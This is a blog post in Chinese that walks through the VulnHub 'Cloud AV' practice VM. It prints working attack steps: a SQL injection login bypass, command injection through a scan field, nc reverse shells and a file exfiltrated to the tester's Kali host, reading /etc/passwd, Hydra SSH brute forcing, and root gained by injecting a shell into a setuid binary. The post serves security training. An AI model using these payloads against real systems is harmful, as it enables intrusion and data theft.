<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8"><meta name="X-UA-Compatible" content="IE=edge"><title> VulnHub-2-BoredHackerBlog:Cloud AV · Patrik's Blog</title><meta name="description" content="VulnHub-2-BoredHackerBlog:Cloud AV - Patrik"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="icon" href="/favicon.png"><link rel="stylesheet" href="/css/apollo.css"><link rel="search" type="application/opensearchdescription+xml" href="http://example.com/atom.xml" title="Patrik's Blog"><meta name="generator" content="Hexo 6.1.0"><link rel="alternate" href="/atom.xml" title="Patrik's Blog" type="application/atom+xml">
</head><body><div class="wrap"><header><a href="/" class="logo-link"><img src="/favicon.png" alt="logo"></a><ul class="nav nav-list"><li class="nav-list-item"><a href="/" target="_self" class="nav-list-link">BLOG</a></li><li class="nav-list-item"><a href="/archives/" target="_self" class="nav-list-link">ARCHIVE</a></li><li class="nav-list-item"><a href="https://github.com/byesec" target="_blank" class="nav-list-link">GITHUB</a></li></ul></header><main class="container"><div class="post"><article class="post-block"><h1 class="post-title">VulnHub-2-BoredHackerBlog:Cloud AV</h1><div class="post-info">2022年1月3日</div><div class="post-content"><span id="more"></span>
<blockquote>
<p><strong>Name:</strong> BoredHackerBlog: Cloud AV</p>
<p><strong>Date release:</strong> 29 Mar 2020</p>
<p><strong>Author</strong>: <a target="_blank" rel="noopener" href="https://www.vulnhub.com/author/boredhackerblog,683/">BoredHackerBlog</a></p>
<p><strong>Series</strong>: <a target="_blank" rel="noopener" href="https://www.vulnhub.com/series/boredhackerblog,295/">BoredHackerBlog</a></p>
<p><strong>Download：</strong><a target="_blank" rel="noopener" href="https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova">https://download.vulnhub.com/boredhackerblog/easy_cloudantivirus.ova</a></p>
<p><strong>Description:</strong></p>
<p>Cloud Anti-Virus Scanner! is a cloud-based antivirus scanning service.</p>
<p>Currently, it’s in beta mode. You’ve been asked to test the setup and find vulnerabilities and escalate privs.</p>
<p><strong>Difficulty:</strong> Easy</p>
<p><strong>Tasks involved:</strong></p>
<ul>
<li>port scanning</li>
<li>webapp attacks</li>
<li>sql injection</li>
<li>command injection</li>
<li>brute forcing</li>
<li>code analysis</li>
</ul>
<p><strong>Virtual Machine:</strong></p>
<ul>
<li>Format: Virtual Machine (Virtualbox OVA)</li>
<li>Operating System: Linux</li>
</ul>
<p><strong>Networking:</strong></p>
<ul>
<li>DHCP Service: Enabled</li>
<li>IP Address Automatically assign</li>
</ul>
<p>This works better with VirtualBox rather than VMware.</p>
</blockquote>
<h2 id="一、信息收集"><a href="#一、信息收集" class="headerlink" title="一、信息收集"></a>一、信息收集</h2><h3 id="1-主机发现"><a href="#1-主机发现" class="headerlink" title="1.主机发现"></a>1.主机发现</h3><pre class="line-numbers language-none"><code class="language-none">ifconfig<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009095714305.png" alt="image-20211009095714305"></p>
<p>kali的IP为10.0.2.4</p>
<p>对10.0.2.0&#x2F;24网段内的IP发送包进行探测发现<img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009095857623.png" alt="image-20211009095857623"></p>
<p>10.0.2.7<strong>返回数据</strong>，说明<strong>存活</strong></p>
<h3 id="2-端口扫描"><a href="#2-端口扫描" class="headerlink" title="2.端口扫描"></a>2.端口扫描</h3><pre class="line-numbers language-none"><code class="language-none">sudo nmap -p- 10.0.2.7<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009101228440.png" alt="image-20211009101228440"></p>
<p>结果显示目标靶机<strong>开放了22,8080端口</strong></p>
<h3 id="3-端口服务扫描发现"><a href="#3-端口服务扫描发现" class="headerlink" title="3.端口服务扫描发现"></a>3.端口服务扫描发现</h3><pre class="line-numbers language-none"><code class="language-none">sudo nmap -p22,8080 -sV 10.0.2.7<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009101354083.png" alt="image-20211009101354083"></p>
<p>目标系统为Ubuntu 且开放了22端口为<strong>SSH服务</strong></p>
<p>8080端口的Werkzeug是基于Python2.7环境</p>
<p>补充：Werkzeug是一个WSGI工具包，Werkzeug可以作为一个 Web 框架的底层库，因为它封装好了很多 Web 框架的东西，例如 Request，Response 等等。如 Flask 框架就是以Werkzeug 为基础开发的。</p>
<h2 id="二、漏洞发现与利用"><a href="#二、漏洞发现与利用" class="headerlink" title="二、漏洞发现与利用"></a>二、漏洞发现与利用</h2><h3 id="1-访问页面"><a href="#1-访问页面" class="headerlink" title="1.访问页面"></a>1.访问页面</h3><pre class="line-numbers language-none"><code class="language-none">访问：http:&#x2F;&#x2F;10.0.10.7:8080<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009102035206.png" alt="image-20211009102035206"></p>
<p>页面如图为“云防病毒平台”，并提示需提交邀请码才能登录使用</p>
<p>那么如何突破这个页面？</p>
<h3 id="2-测试SQL注入-x2F-爆破"><a href="#2-测试SQL注入-x2F-爆破" class="headerlink" title="2.测试SQL注入&#x2F;爆破"></a>2.测试SQL注入&#x2F;爆破</h3><p>尝试在页面文本框内<strong>提交信息（特殊符号）</strong>来服务端后端有没有对用户提交的<strong>敏感字符</strong>（不同语言环境下存在不同作用&#x2F;意义的字符）进行过滤，若未过滤则有可能<strong>发生报错</strong>或会<strong>返回错误信息</strong>。</p>
<p>配置浏览器代理，使用BurpSuite对<strong>符号</strong>进行检测</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009103133428.png" alt="image-20211009103133428"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009104716945.png" alt="image-20211009104716945"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009104651517.png" alt="image-20211009104651517"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009104834953.png" alt="image-20211009104834953"></p>
<p>对页面进行测试后，<strong>通过长度判断</strong>，发现输入双引号(“)可能产生了闭合，改变原语句执行语义，导致报错，报错页面如下图，<strong>判断存在注入漏洞</strong></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009105012567.png" alt="image-20211009105012567"></p>
<p>发现报错页面存在<strong>疑似查询语句</strong></p>
<p><code>&#39;select * from code where password=&quot;&#39; + password + &#39;&quot;&#39;</code></p>
<p>省去单引号</p>
<p><code>select * from code where password=&quot; + password + &quot;</code></p>
<p>尝试通过此语句构造payload</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009105106411.png" alt="image-20211009105106411"></p>
<p>输入**1” or 1&#x3D;1–+**提交后成功利用注入漏洞跨过了“invite code”验证，进入“云防病毒平台”页面</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009105148438.png" alt="image-20211009105148438"></p>
<h3 id="3-命令注入"><a href="#3-命令注入" class="headerlink" title="3.命令注入"></a>3.命令注入</h3><p>可以发现这个页面的所显示的信息是ls -l命令执行的结果，在结合页面下的”File Name”文本框 和”Scan!”提交按钮，可以联想到页面背后的功能实现过程大概是一个“病毒攻击&#x2F;平台”对文件扫描的功能，代码逻辑可能类似如下</p>
<pre class="line-numbers language-none"><code class="language-none">xxxScanner 文件名<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>那么是否可以产生使用<strong>管道符（|）</strong>连接执行其他命令呢？下面进行尝试</p>
<pre class="line-numbers language-none"><code class="language-none">hello | ls<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009142912228.png" alt="image-20211009142912228"></p>
<pre class="line-numbers language-none"><code class="language-none">hello | id<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009142744487.png" alt="image-20211009142744487"></p>
<p>在等待服务端响应后，确实执行了ls和id，并在页面返回了相应的结果，即<strong>存在命令注入漏洞</strong>，那么是否可以反弹shell？</p>
<p>思路1：结合先前扫描结果，可以得到目标系统的语言环境是Python2.7.15，故可以利用Python反弹shell</p>
<p>思路2：利用nc反弹shell</p>
<p>(为了学习更多的攻击方法，选用思路2)</p>
<h3 id="4-使用nc建立连接"><a href="#4-使用nc建立连接" class="headerlink" title="4.使用nc建立连接"></a>4.使用nc建立连接</h3><p>确认目标系统<strong>是否存在nc</strong>命令</p>
<pre class="line-numbers language-none"><code class="language-none">hello | which nc<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009143025187.png" alt="image-20211009143025187"></p>
<p>补充：**| 表示管道符，上一条命令的输出，作为下一条命令参数**</p>
<p>目标系统<strong>存在nc</strong>命令，可正常进行后续操作</p>
<p>在Kali端：</p>
<pre class="line-numbers language-none"><code class="language-none">ip a<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009143140893.png" alt="image-20211009143140893"></p>
<p>确认Kali地址为10.0.2.4</p>
<p>nc监听端口4444</p>
<pre class="line-numbers language-none"><code class="language-none">nc -nvlp 4444<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009143219519.png" alt="image-20211009143219519"></p>
<p>在浏览器端：</p>
<p>使用nc反弹连接kali端的监听，在实验-e参数执行一个shell终端</p>
<pre class="line-numbers language-none"><code class="language-none">hello | nc 10.0.2.4 4444 -e &#x2F;bin&#x2F;sh<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009143635524.png" alt="image-20211009143635524"></p>
<p>执行后，并没有监听端口成功连接，怀疑该系统的系统版本下的nc<strong>不支持-e参数</strong>，所以这里我们先去除-e参数，尝试连接</p>
<pre class="line-numbers language-none"><code class="language-none">hello | nc 10.0.2.4 4444 <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211011150457393.png" alt="image-20211011150457393"></p>
<p>成功建立连接，尝试输入命令</p>
<pre class="line-numbers language-none"><code class="language-none">ls<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">id<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009145019507.png" alt="image-20211009145019507"></p>
<p>结果发现不能执行来返回结果</p>
<p>故<strong>采用多个</strong>管道符（|），此法暂且称为“<strong>nc管道符串联</strong>”</p>
<p>在Kali上同时监听5555和6666端口：</p>
<pre class="line-numbers language-none"><code class="language-none">nc -nvlp 5555<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">nc -nvlp 6666<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009145202343.png" alt="image-20211009145202343"></p>
<p>在浏览器端 采用“nc管道符串联”：</p>
<pre class="line-numbers language-none"><code class="language-none">hello | nc 10.0.2.4 5555 | &#x2F;bin&#x2F;bash | nc 10.0.2.4 6666 <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009145552070.png" alt="image-20211009145552070"></p>
<p>kali端显示两个端口都成功连接</p>
<h3 id="5-信息收集-x2F-ssh爆破"><a href="#5-信息收集-x2F-ssh爆破" class="headerlink" title="5.信息收集&#x2F;ssh爆破"></a>5.信息收集&#x2F;ssh爆破</h3><p>尝试在5555端口监听窗口输入命令，发现执行结果会在6666端口监听窗口显示，成功</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009145754300.png" alt="image-20211009145754300"></p>
<p>登录到目标系统后，查看文件</p>
<pre class="line-numbers language-none"><code class="language-none">ls -l<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009151033812.png" alt="image-20211009151033812"></p>
<p>查看app.py</p>
<pre class="line-numbers language-none"><code class="language-none">cat app.py<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009151112767.png" alt="image-20211009151112767"></p>
<blockquote>
<p>from flask import Flask, render_template, request, session<br>import sqlite3<br>import subprocess<br>import os</p>
<p>conn &#x3D; sqlite3.connect(‘database.sql’,check_same_thread &#x3D; False)<br>c &#x3D; conn.cursor()</p>
<p>app &#x3D; Flask(<strong>name</strong>)</p>
<p>@app.route(‘&#x2F;‘)<br>def index():<br>   return render_template(‘index.html’)</p>
<p>@app.route(‘&#x2F;login’, methods&#x3D;[‘POST’])<br>def login():<br>   password &#x3D; request.form[‘password’]<br>   if len(c.execute(‘select * from code where password&#x3D;”‘ + password + ‘“‘).fetchall()) &gt; 0:<br>       session[‘logged_in’] &#x3D; True<br>       return ‘Redirecting to &#x2F;scan. <meta http-equiv="refresh" content="0; url=/scan" />‘<br>   else:<br>       return “WRONG INFORMATION”</p>
<p>@app.route(‘&#x2F;scan’)<br>def shop():<br>   if session.get(‘logged_in’):<br>       filelist &#x3D; subprocess.Popen(“ls -l &#x2F;home&#x2F;scanner&#x2F;cloudav_app&#x2F;samples”, shell&#x3D;True, stdout&#x3D;subprocess.PIPE, stderr&#x3D;subprocess.PIPE, stdin&#x3D;subprocess.PIPE).stdout.read()<br>       return render_template(‘scan.html’,filelist&#x3D;filelist)<br>   else:<br>       return ‘<meta http-equiv="refresh" content="0; url=/" />‘</p>
<p>@app.route(‘&#x2F;output’, methods&#x3D;[‘POST’])<br>def output():<br>   if session.get(‘logged_in’):<br>       filename &#x3D; request.form[‘filename’]<br>       scan_results &#x3D; subprocess.Popen(“clamscan “+filename, shell&#x3D;True, stdout&#x3D;subprocess.PIPE, stderr&#x3D;subprocess.PIPE, stdin&#x3D;subprocess.PIPE).stdout.read()<br>       return “<pre>" + scan_results + "</pre>“<br>   else:<br>       return ‘<meta http-equiv="refresh" content="0; url=/" />‘</p>
<p>if <strong>name</strong> &#x3D;&#x3D; “<strong>main</strong>“:<br>   app.secret_key &#x3D; os.urandom(12)<br>   app.run(host&#x3D;’0.0.0.0’,port&#x3D;8080, debug&#x3D;True)</p>
</blockquote>
<p>app.py中并没有可以直接有关提权的信息</p>
<p>查看database.sql</p>
<pre class="line-numbers language-none"><code class="language-none">file database.sql<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009151631066.png" alt="image-20211009151631066"></p>
<p>发现数据库版本信息SQLite 3.x，再结合之前sql注入时的页面返回信息</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009152025908.png" alt="image-20211009152025908"></p>
<p>版本信息一致，猜测是Web应用程序服务端的数据库，有可能有隐私数据，所以就有必要查看</p>
<pre class="line-numbers language-none"><code class="language-none">sqlite<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>尝试执行发现没有相关指令</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009151902078.png" alt="image-20211009151902078"></p>
<p>即<strong>服务端无法解析</strong>sqlite文件，那是否可以将下载到kali本机上，使用kali本机上sqlite的执行环节来查看文件database.sql</p>
<p>在Kali端新窗口开启nc监听7777端口，将接收到的所有<strong>连接请求都转发到</strong>db.sql文件</p>
<pre class="line-numbers language-none"><code class="language-none">nc -nvlp 7777 &gt; db.sql<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009152136352.png" alt="image-20211009152136352"></p>
<p>在监听5555端口的窗口内，连接10.0.2.4（kali）的7777端口<strong>再通过重定向</strong>将database.sql传输到nc通道内</p>
<pre class="line-numbers language-none"><code class="language-none">nc 10.0.2.4 7777 &lt; database.sql<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009152503151.png" alt="image-20211009152503151"></p>
<p>database.sql文件不大，很快传输完Ctrl+C结束</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009152617144.png" alt="image-20211009152617144"></p>
<pre class="line-numbers language-none"><code class="language-none">ls<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009152646495.png" alt="image-20211009152646495"></p>
<p>使用kali的sqlite3环境下查看db.sql</p>
<pre class="line-numbers language-none"><code class="language-none">sqlite3<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">.open db.sql<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">.database<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">.dump<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009152831159.png" alt="image-20211009152831159"></p>
<p>显示只有一个字段password,下方的INSERT语句向数据库添加了几个密码，那是否可以登录目标系统？回想发现阶段目标系统上开启ssh服务，所以进行尝试，现在寻找目标系统上的用户名</p>
<pre class="line-numbers language-none"><code class="language-none">cat &#x2F;etc&#x2F;passwd<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009153106205.png" alt="image-20211009153106205"></p>
<p>passwd文件中数据很多，需要做筛选过滤</p>
<p>筛选可以用<strong>shell权限</strong>登录系统的账号</p>
<pre class="line-numbers language-none"><code class="language-none">cat &#x2F;etc&#x2F;passwd | grep &#x2F;bin&#x2F;bash<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009153238876.png" alt="image-20211009153238876"></p>
<p>将用户名和密码都分别生成字典 准备进行爆破</p>
<pre class="line-numbers language-none"><code class="language-none">vi user.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009153516608.png" alt="image-20211009153516608"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009153446916.png" alt="image-20211009153446916"></p>
<pre class="line-numbers language-none"><code class="language-none">vi pass.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009153702323.png" alt="image-20211009153702323"></p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009153648892.png" alt="image-20211009153648892"></p>
<p>使用Hydra爆破</p>
<pre class="line-numbers language-none"><code class="language-none">hydra -L user.txt -P pass.txt ssh:&#x2F;&#x2F;10.0.2.7<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009154535990.png" alt="image-20211009154535990"></p>
<p>破解完成，失望，没有正确结果，这种攻击失败了，尝试别的攻击手段</p>
<h3 id="6-SUID提权"><a href="#6-SUID提权" class="headerlink" title="6.SUID提权"></a>6.SUID提权</h3><p>回到目标机目录下，尝试查看目录下别的文件</p>
<pre class="line-numbers language-none"><code class="language-none">ls<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">ls -l <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">ls samples<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>发现这些文件就是Web界面那些可以进行防病毒扫描的文件</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009160341754.png" alt="image-20211009160341754"></p>
<p>暂时没有发现有帮助的信息</p>
<pre class="line-numbers language-none"><code class="language-none">ls templates<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009160512163.png" alt="image-20211009160512163"></p>
<p>看到template下有两个<strong>Web开发页面模板文件</strong> index.html scan.html，但也没有有帮助的信息</p>
<p>查看查看的目录，确认现在所在目录</p>
<pre class="line-numbers language-none"><code class="language-none">pwd<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009164418370.png" alt="image-20211009164418370"></p>
<p>去上一级目录，&#x2F;home&#x2F;scanner</p>
<pre class="line-numbers language-none"><code class="language-none">cd .. <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">ls<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">ls -la     #查看隐藏文件<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">ls- l<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在隐藏文件中并未发现有直接帮助的文件，但发现了.c文件</p>
<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009165417380.png" alt="image-20211009165417380"></p>
<p>update_cloudav.c可能就是cloudav.app程序的C语言源代码，且可以看到这个程序的权限是<strong>可执行的</strong>，s也代表有suid权限位，且属主是root账号，当执行该程序时会<strong>默认继承该程序属主的权限</strong></p>
<p>设想：如果可以执行这个update_cloudav.c，是否可以通过某种命令注入的方法，<strong>利用suid权限</strong>带来的root权限来<strong>执行某些系统命令来反弹shell</strong>，来<strong>完成提权</strong>？</p>
<pre class="line-numbers language-none"><code class="language-none">cat update_cloudav.c<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<blockquote>
<p>#include &lt;stdio.h&gt;</p>
<p>int main(int argc, char *argv[])<br>{<br>char *freshclam&#x3D;”&#x2F;usr&#x2F;bin&#x2F;freshclam”;</p>
<p>if (argc &lt; 2){<br>printf(“This tool lets you update antivirus rules\nPlease supply command line arguments for freshclam\n”);<br>return 1;<br>}</p>
<p>char *command &#x3D; malloc(strlen(freshclam) + strlen(argv[1]) + 2);<br>sprintf(command, “%s %s”, freshclam, argv[1]);<br>setgid(0);<br>setuid(0);<br>system(command);<br>return 0;</p>
<p>}</p>
</blockquote>
<p>包含了一些<strong>头文件</strong>，定义了一些<strong>变量</strong>，变量指向了操作系统中的文件freshclam，freshclam是给开源杀毒软件cloudav的病毒库升级的软件。这个程序<strong>定义了一个执行参数</strong>，如果程序在执行过程中<strong>不包含</strong>这个参数的话就会<strong>显示信息</strong>，要求提交一个命令行的参数，这样freshclam这个程序才能正常执行，完成病毒库的更新。如果正确使用参数，那么就会正常的运行cloudav，执行病毒库的更新。</p>
<p>总结一下：当我们<strong>执行update_cloudav.c时</strong>，会<strong>调用</strong>了cloudav.app的<strong>病毒更新程序freshclam</strong>，但在执行过程中<strong>要求要有运行参数。</strong></p>
<p>先测试一个参数a</p>
<pre class="line-numbers language-none"><code class="language-none">.&#x2F;update_cloudav a<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009165635210.png" alt="image-20211009165635210"></p>
<p>出现日志文件<strong>报错</strong>，但是不确定是否会对执行有影响，继续尝试</p>
<p>利用管道符串联</p>
<p>在kali端: </p>
<pre class="line-numbers language-none"><code class="language-none">nc -nvlp 7777 <span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">nc -nvlp 8888<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009165823593.png" alt="image-20211009165823593"></p>
<p>在控制目标机端：</p>
<pre class="line-numbers language-none"><code class="language-none">.&#x2F;update_cloudav &quot;a | nc 10.0.2.4 7777 | &#x2F;bin&#x2F;bash | nc 10.0.2.4 8888&quot;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><strong>双引号作用：让.&#x2F;upadte_cloudav程序在执行的时候，认为双引号内的都是参数，从而继承这个程序它的suid位的权限</strong></p>
<pre class="line-numbers language-none"><code class="language-none">id<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><img src="https://byesec-blog-img.oss-cn-beijing.aliyuncs.com/uPic/image-20211009165854532.png" alt="image-20211009165854532"></p>
<p>成功拿到目标系统root权限！</p>
</div></article></div></main><footer><div class="paginator"><a href="/2022/01/04/week3/" class="prev">上一篇</a><a href="/2022/01/02/Multipass/" class="next">下一篇</a></div><div class="copyright"><p>© 2021 - 2022 <a href="http://example.com">Patrik</a>, powered by <a href="https://hexo.io/" target="_blank">Hexo</a> and <a href="https://github.com/pinggod/hexo-theme-apollo" target="_blank">hexo-theme-apollo</a>.</p></div></footer></div><script async src="//cdn.bootcss.com/mathjax/2.7.0/MathJax.js?config=TeX-MML-AM_CHTML" integrity="sha384-crwIf/BuaWM9rM65iM+dWFldgQ1Un8jWZMuh3puxb8TOY9+linwLoI7ZHZT+aekW" crossorigin="anonymous"></script></body></html>